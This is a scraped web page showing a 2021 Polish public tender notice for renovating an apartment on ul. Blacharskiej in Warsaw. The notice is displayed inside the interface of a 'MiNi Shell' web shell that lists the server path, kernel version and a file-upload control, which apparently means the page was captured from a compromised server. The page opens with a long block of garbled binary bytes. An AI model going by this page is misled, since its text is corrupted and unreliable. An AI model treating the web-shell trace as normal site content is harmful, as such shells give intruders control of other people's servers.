JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211008/0022554601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie remontu lokalu mieszkalnego nr 255 w budynku przy ul. Blacharskiej 1 w branży budowlanej, sanitarnej i elektrycznej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m.st. Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010858407</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Irysowa 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-660</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zgnmokotow.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgnmokotow.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie remontu lokalu mieszkalnego nr 255 w budynku przy ul. Blacharskiej 1 w branży budowlanej, sanitarnej i elektrycznej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-29af8db1-27fe-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00225546</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgnmokotow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja miedzy zamawiającym a wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu systemu Marketplanet https:/(oneplace.marketplanet.pl). Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej,który został wskazany w SWZ.<br/>8.2. Pytania do SWZ należy zadawać za pośrednictwem systemu dostępnego pod adresem<br/>https://zgnmokotow.ezamawiajacy.pl, zwanego dalej systemem. Instrukcja korzystania z systemu jest<br/>dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i procedury procesu zakupowego”.<br/>Zamawiający dopuszcza zadawanie pytań do SWZ drogą mailową, na adres<br/>przetargi@zgnmokotow.waw.pl (ze wskazaniem w tytule wiadomości numeru postępowania). Oraz pozostałe zawarte w SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona przez Wykonawcę w języku polskim ściśle według postanowień SWZ.<br/>2. Oferta musi być sporządzona w postaci elektronicznej w formatach danych: .pdf, .doc, .docx, .rff,<br/>.odt, .xls, .xlsx, XAdES i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>3. Zamawiający dopuszcza następujący format przesyłanych dokumentów lub oświadczeń składanych<br/>jako elektroniczna kopia dokumentu: .pdf, .jpg, .tiff, XAdES.<br/>Zamawiający, określając dopuszczalne formaty danych w jakich Wykonawca może przedłożyć<br/>dokumenty lub oświadczenia, korzysta z katalogu formatów wskazanych w załączniku nr 2 do<br/>Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj. Dz.U. z 2017, nr<br/>2247).<br/>4. Zgodnie z art. 137 ust. 1 ustawy z dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji<br/>elektronicznej (Dz. U. z 2019 r. poz. 162) do podpisywania ofert w systemie oraz plików dokumentów<br/>załączanych do oferty oraz pozostałych składanych postępowaniu rekomenduje się użycie<br/>kwalifikowanego podpisu elektronicznego wykorzystującego funkcję skrótu SHA-2.<br/>5. Sporządzenie i złożenie oferty wymaga rejestracji konta wykonawcy w systemie Marketplanet<br/>OnePlace (https:/(oneplace.marketplanet.pl). Czas weryfikacji danych od złożenia wniosku o rejestrację<br/>do aktywacji konta może wynosić do dwóch dni roboczych. Rejestracja konta wykonawcy nie stanowi<br/>zobowiązania do złożenia oferty. Po zarejestrowaniu i aktywacji konta wykonawca sporządza ofert,którą należy opatrzyć i złożyć (wysłać) w systemie :<br/>- kwalifikowanym podpisem elektronicznym,<br/>- podpisem zaufanym,<br/>- podpisem osobistym<br/>Wykonawca składa ofertę wraz z wymaganymi oświadczeniami i dokumentami. Wykonawca może<br/>złożyć jedną ofertę. Wykonawca może przed upływem terminu składania ofert zmienić lub wycofać<br/>ofertę. I pozostałe zawarte w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny na<br/>podstawie art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady(UE)2016/679 z dnia 27<br/>kwietnia2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych)(Dz.Urz.UEL119z04.05.2016,str.1). I pozostałe informacje<br/>dotyczące RODO znajdują się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TZ.PNK.260.39.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 33803,33 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1. Przedmiotem zamówienia jest wykonanie remontu lokalu mieszkalnego nr 255 w budynku<br/>przy ul. Blacharskiej 1 w Warszawie w branżach ogólnobudowlanej, sanitarnej i elektrycznej,<br/>mającego na celu przywrócenie mu funkcji służących do zaspokojenia potrzeb bytowych jego<br/>mieszkańców.<br/>5.1.1. W zakresie przedmiotu zamówienia roboty należy wykonać zgodnie ze<br/>Specyfikacją Techniczną Wykonania i Odbioru Robót w branży<br/>ogólnobudowlanej, sanitarnej i elektrycznej, stanowiącą Rozdział IV SIWZ<br/>oraz zgodnie z przedmiarami robót w branży ogólnobudowlanej,<br/>sanitarnej i elektrycznej, stanowiącymi Rozdział V SIWZ.<br/>5.1.2. Do wykonania przewidziane są n/w roboty wyszczególnione w przedmiarach<br/>robót:<br/>5.1.2.1. Branża budowlana: obejmuje wykonanie robót: - posadzkarskich, - murarsko-tynkarskich,- stolarskich,- malarskich, - wywóz elementów z rozbiórki na zwałkę.<br/>5.1.2.2. Branża sanitarna: obejmuje wykonanie robót: - wymianieę instalacji lokalowej wod-kan, -<br/>wymianieę urządzeń sanitarnych, - wymianęie armatury sanitarnej, - sprawdzenie szczelności<br/>instalacji zw i c.w., wymianie kuchni gazowej,- próbie ciśnieniowej instalacji gazowej,<br/>wywiezieniu elementów z rozbiórki na złom,<br/>5.1.2.3.Branża elektryczna: obejmuje wykonanie robót: - wymianie ę instalacji elektrycznej<br/>zasilającej i wewnętrznej w lokalu na system TNS, zgodną z PN-ICE 60 364 jako podtynkową<br/>trójżyłową z rozdzielonymi obwodami gniazd wtyczkowych i oświetlenia, - wymianie tablicy<br/>zabezpieczeń mieszkaniowych na wyposażoną w wyłączniki modułowe: nadprądowe i wyłącznik<br/>przeciwporażeniowy, - wykonanie w lokalu robót instalacyjnych elektrycznych zgodnie z<br/>przedmiarem robót i technologią ujętą w STWiORB polegających na montażu: obwodów<br/>instalacyjnych gniazd wtyczkowych, oświetlenia, dzwonkowego, domofonowego i osprzętu<br/>instalacyjnego usytuowanego zgodnie z dokumentacją i wytycznymi Normy N SEP E-002,<br/>wykonanie powykonawczych pomiarów instalacji elektrycznej zgodnie z przedmiarem robót, -<br/>wykonanie dokumentacji powykonawczej zawierającej protokoły z pomiarów, schemat ideowy i<br/>naniesione na rysunku rzutu lokalu elementy wykonanej instalacji. Licznik energii elektrycznej –<br/>licznik zdemontowany, lokal nie posiada zasilania z sieci ergetycznej Innogy Stoen Operator Sp z o.o. Oraz pozostałe zawarte w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień podobnych o których mowa w<br/>214 ust. 1 pkt. 7 w zw. z art. 266 ustawy Prawo zamówień publicznych. Zakres ewentualnych<br/>zamówień podobnych może obejmować zakres przedmiotu zamówienia. Wartość szacunkowa<br/>zamówienia może wynieść do 15% zamówienia podstawowego. Wykonawca będzie wykonywał<br/>zamówienie należycie i bez zbędnej zwłoki na warunkach umowy podstawowej. Ceny będą podlegały<br/>negocjacjom.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">praktyka zawodowa kierownika robót w zakresie nadzorowania robót w branży budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">praktyka zawodowa kierownika robót w zakresie nadzorowania robót w branży sanitarnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">praktyka zawodowa kierownika robót w zakresie nadzorowania robót w branży elektrycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 19. INFORMACJA O WARUNKACH UDZIAŁU W POSTĘPOWANIU.<br/>19.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> nie podlegają wykluczeniu na podstawie art. 108 ust.1 i 109 ust.1 pkt.4 ,<br/> spełniają warunki udziału w postępowaniu dotyczące:<br/>19.1.1. zdolności do występowania w obrocie gospodarczym:<br/>w celu stwierdzenia braku podstaw wykluczenia wykonawca winien wykazać się posiadaniem<br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej w zakresie art.109 ust.1 pkt. 4 ustawy,<br/>19.1.2. uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z<br/>odrębnych przepisów: nie dotyczy w przedmiotowym postępowaniu.<br/>19.1.3. sytuacji ekonomicznej lub finansowej :<br/>W celu wykazania spełnienia warunku posiadania sytuacji ekonomicznej i finansowej<br/>zapewniającej wykonanie zamówienia Wykonawca winien wykazać się posiadaniem dokumentu<br/>potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia w wysokość sumy gwarancyjnej<br/>nie mniejszej niż 50.000,00 zł.<br/>19.1.4. zdolności technicznej lub zawodowej:<br/>w celu potwierdzenia spełnienia warunków dotyczących zdolności technicznej lub zawodowej<br/>zapewniającej wykonanie zamówienia wykonawca winien wykazać, że:<br/>19.1.4.1. wykonał należycie, nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, zadania odpowiadające swoim rodzajem<br/>robotom stanowiącym przedmiot zamówienia tj. wykonał co najmniej 2 roboty budowlane<br/>polegające na wykonaniu remontów lokali mieszkalnych i/lub użytkowych o wartości nie<br/>mniejszej niż 20.000,00 zł brutto każda.<br/>19.1.4.2. dysponuje osobami do realizacji zamówienia publicznego tj. co najmniej 3 osobami w<br/>tym: 1 osobą z uprawnieniami montera instalacji sanitarnych i gazowych, 1 osobą z<br/>kwalifikacjami murarza, tynkarza, malarza, posadzkarza i 1 osobą do wykonywania robót<br/>elektrycznych z doświadczeniem i kwalifikacjami w wykonywaniu robót budowlanych będących<br/>przedmiotem zamówienia, zatrudnionymi na podstawie umowy o pracę w sposób określony w<br/>art. 22 § 1 ustawy Kodeks pracy (Dz.U. z 2020 r. poz. 1320 z późn. zm.).<br/>19.1.4.3. dysponuje osobami, do kierowania robotami budowlanymi w branży<br/>ogólnobudowlanej, sanitarnej i elektrycznej, posiadającymi odpowiednie uprawnienia budowlane<br/>w zakresie konstrukcyjno-budowalnym, sanitarnym i elektrycznym bez ograniczeń w zakresie<br/>przedmiotu zamówienia określone, przepisami Prawa budowlanego, dla przedmiotu<br/>zamówienia,<br/>lub odpowiedni dokument stwierdzający przygotowanie zawodowe do kierowania budową lub<br/>robotami w w/w zakresie budowlanym, oraz aktualne zaświadczenia o wpisie na listę członków<br/>właściwej izby samorządu zawodowego. Praktyka zawodowa kierowników robót budowlanych w<br/>zakresie nadzorowania robót budowlanych, stanowi jedno z kryteriów oceny ofert i punktowana<br/>będzie w sposób opisany w pkt. 16. SWZ.<br/>19.2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie<br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIESPEŁNIA.<br/>19.3. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są do łącznego spełnienia<br/>takich samych warunków udziału w postępowaniu o udzielenie zamówienia, jak<br/>wykonawcywystępujący samodzielnie tj: przy ocenie spełnienia warunków, o których mowa w<br/>art. 112<br/>ustawy, zamawiający będzie brał pod uwagę łączny potencjał techniczny i kadrowy<br/>wykonawców, ich łączne kwalifikacje oraz łączną sytuację ekonomiczną i finansową przy czym:<br/>19.3.1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki,o których mowa w pkt. 19.1.3. SWZ, zostaną spełnione wyłącznie wtedy gdy jeden zWykonawców będzie posiadał dokument potwierdzający ubezpieczenie od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w pełnej<br/>wysokości sumy gwarancyjnej wymaganej przez Zamawiającego w pkt. 19.1.3. SWZ.<br/>19.3.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki,<br/>o których mowa w pkt. 19.1.4.1. SWZ, zostaną spełnione wyłącznie wtedy gdy jeden z<br/>Wykonawców wykaże się wykonaniem wszystkich wymaganych robót budowlanych<br/>samodzielnie. Za spełnienie warunku nie będzie uznane wykazanie, że np. „Wykonawca A”<br/>wykonał 1 robotę budowlaną i „Wykonawca B” wykonał 1 robotę budowlaną.<br/>I pozostałe zawarte w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu:oświadczenia w zakresie wskazanym w załączniku nr 1 i 2 do wzoru<br/>Formularza oferty - Rozdział II SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne<br/>potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. I<br/>pozostałe zawarte w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">20.1. Zgodnie z art. 274 ust. 2 ustawy Prawo zamówień publicznych<br/>Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę (lub wykonawców), którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, od dnia wezwania<br/>podmiotowych środków dowodowych aktualnych na dzień ich złożenia:<br/>20.1.1. wykazu robót, o których mowa w pkt. 19.1.4.1. SWZ (wg wzoru stanowiącego załącznik do<br/>materiałów postępowania) wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie – wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Do wykazu robót Wykonawca powinien dołączyć informację, czy roboty wymienione w wykazie robót<br/>wykonał sam czy potwierdzają wiedzę i doświadczenie innego podmiotu, którego zobowiązanie do<br/>udostępnienia wiedzy i doświadczenia winien załączyć wraz ze zobowiązaniem do jego udziału w<br/>wykonaniu części zamówienia.<br/>20.1.2. 